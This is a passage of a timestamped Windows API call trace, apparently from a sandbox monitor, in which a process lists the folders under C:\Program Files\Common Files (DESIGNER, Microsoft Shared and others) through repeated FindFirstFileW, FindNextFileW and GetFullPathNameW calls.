lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.040] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0042.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0042.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0042.040] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.040] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.041] CoTaskMemFree (pv=0x4fe370) [0042.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0042.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0042.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0042.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x27 [0042.041] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.041] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.042] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0042.042] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.042] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0042.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0042.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0042.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0042.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0042.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x27 [0042.042] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.042] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.042] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0042.043] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0042.043] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0042.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0042.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0042.043] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.043] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.043] CoTaskMemFree (pv=0x4fe370) [0042.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0042.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0042.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0042.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x2f [0042.044] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.044] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.044] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0042.044] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0042.044] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0042.047] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0042.048] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0042.048] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0042.048] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0042.048] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, 